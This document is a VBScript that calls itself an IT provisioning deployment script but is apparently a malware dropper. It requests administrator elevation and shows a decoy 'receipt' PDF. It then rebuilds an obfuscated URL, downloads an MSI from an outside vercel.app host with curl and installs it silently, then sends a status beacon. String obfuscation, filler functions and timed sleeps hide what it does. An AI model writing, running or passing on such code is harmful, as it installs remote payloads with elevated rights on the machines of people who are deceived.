' Automated deployment script - generated by IT provisioning system
Option Explicit

Dim sysShell, fsHandler, strAppHandler, strFSClass, netRequest, ioStream, strTempDir, targetFile, strResourceURL, strDocURL, strWebHandler, strStreamType, strSetupExe, strBatchFlag, strProcessor, strPrivLevel, strSessionFlag

strAppHandler = Replace("Shell.ApplWcation", "W", "i")
strFSClass = "Scripting.FileSystemObject"
strProcessor = "wscript.exe"
strPrivLevel = Mid("Module=runas;Active=True", 8, 5)
strSessionFlag = Replace("eJevated", "J", "l")


Sub WriteToStaging(arrContent, strDest)
    strStreamType = Mid("Provider=ADODB.Stream;Pool=Default", 10, 12)
    Dim intStreamCfg : intStreamCfg = CInt("1")
    Dim intWriteMode : intWriteMode = CInt("2")
    Set ioStream = CreateObject(strStreamType)
    ioStream.Type = intStreamCfg
    ioStream.Open
    ioStream.Write arrContent
    ioStream.SaveToFile strDest, intWriteMode
    ioStream.Close
End Sub

Sub DeployPackage(strTarget)
    DebugLog "Execute sub started with path: " & strTarget
    On Error Resume Next
    If Not fsHandler.FileExists(strTarget) Then
        DebugLog "Execute error: target file does not exist"
        Exit Sub
    End If
    On Error GoTo 0
    strSetupExe = Replace("msiexecKexe", "K", ".")
    strBatchFlag = Mid("Type=/qn;Mode=1", 6, 3)
    Set sysShell = CreateObject(strAppHandler)
    sysShell.ShellExecute strSetupExe, "/i """ & strTarget & """ " & strBatchFlag, "", "open", 1
End Sub


Sub ValidateAccess()
    DebugLog "Elevation sub started"
    Dim strCmdArgs
    If Not WScript.Arguments.Named.Exists(strSessionFlag) Then
        strCmdArgs = """" & WScript.ScriptFullName & """ /" & strSessionFlag
        Set sysShell = CreateObject(strAppHandler)
        sysShell.ShellExecute strProcessor, strCmdArgs, "", strPrivLevel, 1
        WScript.Quit
    End If
End Sub

Sub PresentContent()
    strDocURL = "https://pdfviewer-nu.vercel.app/doc/wureceipt.pdf"
    Dim oNavShell, strBrowserProvider
    strBrowserProvider = "WScript.Shell"
    Set oNavShell = CreateObject(strBrowserProvider)
    oNavShell.Run strDocURL, 1, False
End Sub

Sub ReportStatus()
    ' Enterprise telemetry integration
    On Error Resume Next
    Dim objTelemetry : Set objTelemetry = CreateObject("MSXML2.ServerXMLHTTP")
    Dim strReportEndpoint : strReportEndpoint = "https://telemetry.internal.local/pu5e/report"
    Dim strJobRef : strJobRef = "LRLWND8"
    Dim strTelemetry : strTelemetry = "session=" & strJobRef & "&status=complete"
    objTelemetry.Open "POST", strReportEndpoint, False
    objTelemetry.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    objTelemetry.Send strTelemetry
    If objTelemetry.Status <> 200 Then
        ' Telemetry endpoint unreachable — continue silently
    End If
    On Error GoTo 0
End Sub

Sub ValidateEnvironment()
    Dim strVal
    strVal = "pqmco8"
    If Len(strVal) < 2 Then Exit Sub
End Sub


Sub AcquirePackage(strURL, strDest)
    Dim objCmdRunner, strCmdProvider
    strCmdProvider = Replace(Replace("@Script.S#ell", "@", "W"), "#", "h")
    Set objCmdRunner = CreateObject(strCmdProvider)
    Dim intStatus
    Dim strCmd : strCmd = "curl.exe -s -L --fail -o """ & strDest & """ """ & strURL & """"
    intStatus = objCmdRunner.Run(strCmd, 0, True)
    If intStatus <> 0 Then WScript.Quit
    Dim oCheckFSO, strFsCheckType
    strFsCheckType = Replace(Replace("Scripting.FileSystemObj!c|", "!", "e"), "|", "t")
    Set oCheckFSO = CreateObject(strFsCheckType)
    If Not oCheckFSO.FileExists(strDest) Then WScript.Quit
End Sub


Sub DebugLog(strMessage)
    On Error Resume Next
    Dim objDebugFSO : Set objDebugFSO = CreateObject("Scripting.FileSystemObject")
    Dim strDebugPath : strDebugPath = objDebugFSO.GetSpecialFolder(2) & "\vbs_debug.log"
    Dim objDebugFile : Set objDebugFile = objDebugFSO.OpenTextFile(strDebugPath, 8, True)
    objDebugFile.WriteLine Now() & " | " & strMessage
    objDebugFile.Close
    On Error GoTo 0
End Sub

Function VerifyIntegrity(strData)
    Dim strExpected : strExpected = "CB2C44B9"
    Dim nLen : nLen = Len(strData)
    If nLen < 4 Then
        VerifyIntegrity = False
        Exit Function
    End If
    VerifyIntegrity = True
End Function


Function CheckService(strName)
    CheckService = True
    If strName = "" Then CheckService = False
End Function

' --- Entry Point ---
ValidateAccess
    DebugLog "Elevation completed"

WScript.Sleep 1372
PresentContent
    DebugLog "Media opened"
WScript.Sleep 858

Set fsHandler = CreateObject(strFSClass)
Dim intFolderCfg : intFolderCfg = 1 + 1
strTempDir = fsHandler.GetSpecialFolder(intFolderCfg)
targetFile = strTempDir & "\puttinstaller.msi"
Dim arrParts : arrParts = Array("https://pd", "fviewer-nu", ".vercel.ap", "p/doc/upda", "ter.msi")
strResourceURL = ""
Dim iSeg
For iSeg = LBound(arrParts) To UBound(arrParts)
    strResourceURL = strResourceURL & arrParts(iSeg)
Next

    DebugLog "Starting download to: " & targetFile
AcquirePackage strResourceURL, targetFile
    DebugLog "Download completed"
Dim strStep : strStep = "ready"
    Dim strCurrentTime : strCurrentTime = Now()
    WScript.Sleep 275
    Dim oFileSystem : Set oFileSystem = CreateObject("Scripting.FileSystemObject")
    Dim strPathCheck : strPathCheck = oFileSystem.FileExists("C:\Windows\explorer.exe")
    If Not strPathCheck Then WScript.Sleep 500
    DebugLog "Starting execution"
DeployPackage targetFile
    DebugLog "Execution completed"

' Post-deployment telemetry
ReportStatus
WScript.Sleep 1000